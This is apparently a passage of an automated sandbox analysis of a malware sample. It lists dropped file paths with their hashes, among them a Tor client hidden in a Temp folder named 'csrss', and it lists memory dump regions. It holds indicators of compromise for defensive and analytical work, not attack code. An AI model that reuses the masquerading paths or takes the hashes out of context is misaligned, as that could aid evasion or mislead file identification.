| SHA512 | 8b2c28b22c454299418a7acc3a971ea77e8af6923ca07e979c93fac90541345096877e998b0bdb326e9337f56aa6cc563efed1dae2fa624e75ee0516f8bca4a1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
memory/5144-1447-0x0000000000AD0000-0x0000000000CFD000-memory.dmp
memory/7688-1493-0x00000000029B0000-0x00000000029E6000-memory.dmp
memory/7688-1497-0x00000000747E0000-0x0000000074F90000-memory.dmp
memory/7688-1500-0x0000000005210000-0x0000000005838000-memory.dmp
memory/5192-1502-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
memory/7688-1499-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/7688-1514-0x00000000051D0000-0x00000000051F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_niqwovs2.tya.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/7688-1523-0x00000000058E0000-0x0000000005946000-memory.dmp
memory/7688-1530-0x0000000005B80000-0x0000000005ED4000-memory.dmp
memory/7688-1556-0x0000000005FD0000-0x0000000005FEE000-memory.dmp
memory/7688-1585-0x00000000064A0000-0x00000000064E4000-memory.dmp
memory/7688-1604-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/7688-1635-0x00000000079E0000-0x000000000805A000-memory.dmp
memory/7688-1637-0x0000000007380000-0x000000000739A000-memory.dmp
memory/7868-1665-0x00007FFEDF5D0000-0x00007FFEE0091000-memory.dmp
memory/7688-1664-0x0000000007540000-0x0000000007572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpFF5.tmp
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Temp\tmp1039.tmp
| MD5 | bc741c35d494c3fef538368b3cd7e208 |
| SHA1 | 71deaa958eaf18155e7cdc5494e11c27e48de248 |
| SHA256 | 97658ad66f5cb0e36960d9b2860616359e050aad8251262b49572969c4d71096 |
| SHA512 | be8931de8578802ff899ef8f77339fe4d61df320e91dd473db1dc69293ed43cd69198bbbeb3e5b39011922b26b4e5a683e082af68e9d014d4e20d43f1d5bcc30 |
C:\Users\Admin\AppData\Local\Temp\tmp1094.tmp
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\tmp10A9.tmp
| MD5 | 2732c24b7a7bb6ccf8ad6b47e4239621 |
| SHA1 | 83d7efe0ce8d43fbe6aaf7e0d2f2954c715097c0 |
| SHA256 | ffdc5c7db2eea0dd63396714f77b7e25cd7b92cb9d939a87fa852ab388c49d43 |
| SHA512 | f46d8ed4a956dfc3ca6c984e95e3fc751f4b99b3992389ecbb77fb6203858ace3e3d76a8b4c46b80aa04e1a2112e13da9e1a9aeaa43523e99a0f3d30e6028f0a |
C:\Users\Admin\AppData\Local\Temp\tmp10F8.tmp
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\tmp1114.tmp
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
C:\Users\Admin\AppData\Local\Temp\tmp1731.tmp
| MD5 | 72f43724d661c1ee5534063bd3efe7dd |
| SHA1 | 1de9a4220ab7ebce95f6359bca6b2fcb6c04857a |
| SHA256 | 4485596428f4666d3e9087830c329d9a1535f940f65e0ba2d176a29f1e4e07d2 |
| SHA512 | 977d56f7e73a4ced0c332320e73c790c9292cbdcc63af362ea7b67ef02a1ce45f73218e7e4418e50661ef9a2a514a5aa2458b9214c167a316ea9de563b673d87 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdesc-consensus.tmp
| MD5 | fce25d9bad9f0e1e55050334cfa8ff2c |
| SHA1 | 79a477235ad1310b42b20586b18b3bde9f263b83 |
| SHA256 | cf0a157b96965c114e56894944fb2e8920ffe7829a7f1cfa576889ca2b6578a4 |
| SHA512 | 5d256adab1c210cc60d91a1328c43bcee6598ebadfdeec11d0325d9382e3be29fd85e6cccdc2f44fb5a9b5609383888acf220086c80b8d9f10a96762a3eff233 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdescs.new
| MD5 | 9bff128c4f04ee0ab04d9c12c91562f8 |
| SHA1 | e2b73b4f0fe31a6897c6e5c87cfe0021cd43a08b |
| SHA256 | f6404c02a69b81bbef09ae285c005a9e21366c6b813ceaa6a2f287d8e0fd6be6 |
| SHA512 | db741f15fd882ce306a069cdf32364fec896b6cbc4a8834fed19a019eae5c7075bf8ee6480fbc4beede312b7574f00c67578d486e0faf8e2582521e11e0950d5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4dbde944-0fef-4a75-a670-6057d7bf8404.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a3f53298c43cdf308c31ce2dccf7f134 |
| SHA1 | f3cbaacc4cf8df2e532f34bacf2530b465a232cd |
| SHA256 | 76492a7192a900d07e5ff0697bce25a3da1b9f774144307fab9231e8dab101df |
| SHA512 | fd543a3954cb39c1ad2cf8a1a66bdec45454b7820f6249826b252f4ec98b47afbc8e9db1212c265e6480b630918ed8f70f460bb1b6cb3ad1381937bcc5247818 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b7338630bea1ec590a70cc1dca3898d9 |
| SHA1 | 233c0a06049e93e99713120fc2614fcbecee007d |
| SHA256 | 8d4284b861399d6a2a1bec26d19dba3534e5bb9559ca8cb573ce1bb7b14065ee |
| SHA512 | 6e1a2ac577f359dbffc0caa7dfc25f5d4172d22a08e89b3502230ab89393f38028c2862a0a6ead578590b74b3dbc8e70a2990d6b11ef4f9325eb6cfe8c923bf0 |